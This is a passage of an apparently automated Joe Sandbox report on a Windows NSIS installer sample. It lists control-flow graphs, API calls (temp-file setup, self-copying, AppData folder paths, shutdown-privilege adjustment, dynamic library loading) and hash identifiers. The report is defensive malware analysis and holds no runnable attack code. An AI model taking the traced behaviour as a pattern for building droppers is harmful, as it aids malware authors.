ShowWindow 5421->5424 5425 40558b GetDlgItem SendMessageW 5421->5425 5422->5408 5426 40570d 5422->5426 5423->5422 5427 40556d ShowWindow 5424->5427 5430 40557a 5424->5430 5425->5408 5428 4055b2 SendMessageW SendMessageW 5425->5428 5429 405729 SendMessageW 5426->5429 5427->5430 5428->5408 5429->5429 5431 405746 OpenClipboard EmptyClipboard GlobalAlloc 
GlobalLock 5429->5431 5436 40424c SendMessageW 5430->5436 5433 40576b SendMessageW 5431->5433 5433->5433 5434 405794 GlobalUnlock SetClipboardData CloseClipboard 5433->5434 5434->5408 5435->5399 5436->5425 5437->5396 5438 4028a7 5439 402c37 17 API calls 5438->5439 5440 4028b5 5439->5440 5441 4028cb 5440->5441 5443 402c37 17 API calls 5440->5443 5442 405d4f 2 API calls 5441->5442 5444 4028d1 5442->5444 5443->5441 5466 405d74 GetFileAttributesW CreateFileW 5444->5466 5446 4028de 5447 402981 5446->5447 5448 4028ea GlobalAlloc 5446->5448 5451 402989 DeleteFileW 5447->5451 5452 40299c 5447->5452 5449 402903 5448->5449 5450 402978 CloseHandle 5448->5450 5467 40332b SetFilePointer 5449->5467 5450->5447 5451->5452 5454 402909 5455 403315 ReadFile 5454->5455 5456 402912 GlobalAlloc 5455->5456 5457 402922 5456->5457 5458 402956 5456->5458 5460 4030fa 31 API calls 5457->5460 5459 405e26 WriteFile 5458->5459 5461 402962 GlobalFree 5459->5461 5465 40292f 5460->5465 5462 4030fa 31 API calls 5461->5462 5464 402975 5462->5464 5463 40294d GlobalFree 5463->5458 5464->5450 5465->5463 5466->5446 5467->5454 4276 4058aa ShellExecuteExW 5468 40432b lstrcpynW lstrlenW 4277 40202c 4278 40203e 4277->4278 4288 4020f0 4277->4288 4279 402c37 17 API calls 4278->4279 4281 402045 4279->4281 4280 401423 24 API calls 4284 40224a 4280->4284 4282 402c37 17 API calls 4281->4282 4283 40204e 4282->4283 4285 402064 LoadLibraryExW 4283->4285 4286 402056 GetModuleHandleW 4283->4286 4287 402075 4285->4287 4285->4288 4286->4285 4286->4287 4300 4066cb WideCharToMultiByte 4287->4300 4288->4280 4291 402086 4294 4020a5 4291->4294 4295 40208e 4291->4295 4292 4020bf 4293 4052e6 24 API calls 4292->4293 4296 402096 4293->4296 4303 10001759 4294->4303 4297 401423 24 API calls 4295->4297 4296->4284 4298 4020e2 FreeLibrary 4296->4298 4297->4296 4298->4284 4301 4066f5 GetProcAddress 4300->4301 4302 402080 4300->4302 4301->4302 4302->4291 4302->4292 4304 10001789 4303->4304 4345 10001b18 4304->4345 4306 10001790 4307 

                                                Control-flow Graph

                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 00403396
                                                • GetVersion.KERNEL32 ref: 0040339C
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033CF
                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                • OleInitialize.OLE32(00000000), ref: 00403413
                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                • GetCommandLineW.KERNEL32(00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\3507071243740008011.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                  • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                  • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035D5
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F1
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                • ExitProcess.KERNEL32 ref: 0040370A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371D
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372C
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\3507071243740008011.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\3507071243740008011.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                • ExitProcess.KERNEL32 ref: 004038B0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular$C:\Users\user\Desktop$C:\Users\user\Desktop\3507071243740008011.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 2488574733-1263452082
                                                • Opcode ID: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                • Opcode Fuzzy Hash: d39332670e42baa2e4338040fdf84325205f2ee1dee207f194f6fe0ff4ed9f93
                                                • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E

                                                Control-flow Graph

                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C7A
                                                • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                • DeleteObject.GDI32(00000000), ref: 00404D58
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                • GlobalFree.KERNEL32(?), ref: 00405092
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                • ShowWindow.USER32(?,00000000), ref: 00405231
                                                • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                • ShowWindow.USER32(00000000), ref: 00405243
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58
                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2455471246.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2455454451.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455493031.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000000.00000002.2455538566.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc
                                                • String ID:
                                                • API String ID: 4227406936-0
                                                • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                Control-flow Graph

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059B9
                                                • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A01
                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A24
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                                • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A3A
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                • \*.*, xrefs: 004059FB
                                                • "C:\Users\user\Desktop\3507071243740008011.exe", xrefs: 00405990
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3701117409
                                                • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CA4,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D0
                                                • FindClose.KERNEL32(00000000), ref: 004065DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698

                                                Control-flow Graph

                                                control_flow_graph 261 403d3e-403d50 262 403e91-403ea0 261->262 263 403d56-403d5c 261->263 265 403ea2-403eea GetDlgItem * 2 call 404217 SetClassLongW call 40140b 262->265 266 403eef-403f04 262->266 263->262 264 403d62-403d6b 263->264 267 403d80-403d83 264->267 268 403d6d-403d7a SetWindowPos 264->268 265->266 270 403f44-403f49 call 404263 266->270 271 403f06-403f09 266->271 273 403d85-403d97 ShowWindow 267->273 274 403d9d-403da3 267->274 268->267 279 403f4e-403f69 270->279 276 403f0b-403f16 call 401389 271->276 277 403f3c-403f3e 271->277 273->274 280 403da5-403dba DestroyWindow 274->280 281 403dbf-403dc2 274->281 276->277 292 403f18-403f37 SendMessageW 276->292 277->270 278 4041e4 277->278 286 4041e6-4041ed 278->286 284 403f72-403f78 279->284 285 403f6b-403f6d call 40140b 279->285 287 4041c1-4041c7 280->287 289 403dc4-403dd0 SetWindowLongW 281->289 290 403dd5-403ddb 281->290 295 4041a2-4041bb DestroyWindow EndDialog 284->295 296 403f7e-403f89 284->296 285->284 287->278 294 4041c9-4041cf 287->294 289->286 297 403de1-403df2 GetDlgItem 290->297 298 403e7e-403e8c call 40427e 290->298 292->286 294->278 300 4041d1-4041da ShowWindow 294->300 295->287 296->295 301 403f8f-403fdc call 4062a4 call 404217 * 3 GetDlgItem 296->301 302 403e11-403e14 297->302 303 403df4-403e0b SendMessageW IsWindowEnabled 297->303 298->286 300->278 331 403fe6-404022 ShowWindow KiUserCallbackDispatcher call 404239 EnableWindow 301->331 332 403fde-403fe3 301->332 304 403e16-403e17 302->304 305 403e19-403e1c 302->305 303->278 303->302 308 403e47-403e4c call 4041f0 304->308 309 403e2a-403e2f 305->309 310 403e1e-403e24 305->310 308->298 312 403e65-403e78 SendMessageW 309->312 314 403e31-403e37 309->314 310->312 313 403e26-403e28 310->313 312->298 313->308 317 403e39-403e3f call 40140b 314->317 318 403e4e-403e57 call 40140b 314->318 329 403e45 317->329 318->298 327 403e59-403e63 318->327 327->329 329->308 335 404024-404025 331->335 336 404027 331->336 332->331 337 404029-404057 GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404059-40406a SendMessageW 337->338 339 40406c 337->339 340 404072-4040b1 call 40424c call 403d1f call 406282 lstrlenW call 4062a4 SetWindowTextW call 401389 338->340 339->340 340->279 351 4040b7-4040b9 340->351 351->279 352 4040bf-4040c3 351->352 353 4040e2-4040f6 DestroyWindow 352->353 354 4040c5-4040cb 352->354 353->287 356 4040fc-404129 CreateDialogParamW 353->356 354->278 355 4040d1-4040d7 354->355 355->279 357 4040dd 355->357 356->287 358 40412f-404186 call 404217 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 404188-4041a0 ShowWindow call 404263 358->363 363->287
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                • ShowWindow.USER32(?), ref: 00403D97
                                                • DestroyWindow.USER32 ref: 00403DAB
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                • EnableWindow.USER32(?,?), ref: 0040401A
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                • EnableMenuItem.USER32(00000000), ref: 00404037
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 3282139019-0
                                                • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D

                                                Control-flow Graph

                                                control_flow_graph 366 403990-4039a8 call 40665c 369 4039aa-4039ba call 4061c9 366->369 370 4039bc-4039f3 call 406150 366->370 379 403a16-403a3f call 403c66 call 405c5b 369->379 375 4039f5-403a06 call 406150 370->375 376 403a0b-403a11 lstrcatW 370->376 375->376 376->379 384 403ad1-403ad9 call 405c5b 379->384 385 403a45-403a4a 379->385 391 403ae7-403b0c LoadImageW 384->391 392 403adb-403ae2 call 4062a4 384->392 385->384 386 403a50-403a78 call 406150 385->386 386->384 393 403a7a-403a7e 386->393 395 403b8d-403b95 call 40140b 391->395 396 403b0e-403b3e RegisterClassW 391->396 392->391 397 403a90-403a9c lstrlenW 393->397 398 403a80-403a8d call 405b80 393->398 410 403b97-403b9a 395->410 411 403b9f-403baa call 403c66 395->411 399 403b44-403b88 SystemParametersInfoW CreateWindowExW 396->399 400 403c5c 396->400 404 403ac4-403acc call 405b53 call 406282 397->404 405 403a9e-403aac lstrcmpiW 397->405 398->397 399->395 403 403c5e-403c65 400->403 404->384 405->404 409 403aae-403ab8 GetFileAttributesW 405->409 414 403aba-403abc 409->414 415 403abe-403abf call 405b9f 409->415 410->403 419 403bb0-403bca ShowWindow call 4065ec 411->419 420 403c33-403c3b call 4053b9 411->420 414->404 414->415 415->404 427 403bd6-403be8 GetClassInfoW 419->427 428 403bcc-403bd1 call 4065ec 419->428 425 403c55-403c57 call 40140b 420->425 426 403c3d-403c43 420->426 425->400 426->410 429 403c49-403c50 call 40140b 426->429 432 403c00-403c23 DialogBoxParamW call 40140b 427->432 433 403bea-403bfa GetClassInfoW RegisterClassW 427->433 428->427 429->410 437 403c28-403c31 call 4038e0 432->437 433->432 437->403
                                                APIs
                                                  • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                  • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\3507071243740008011.exe",00000000), ref: 00403A11
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\pechay\transskribere\jon), ref: 00403AF8
                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
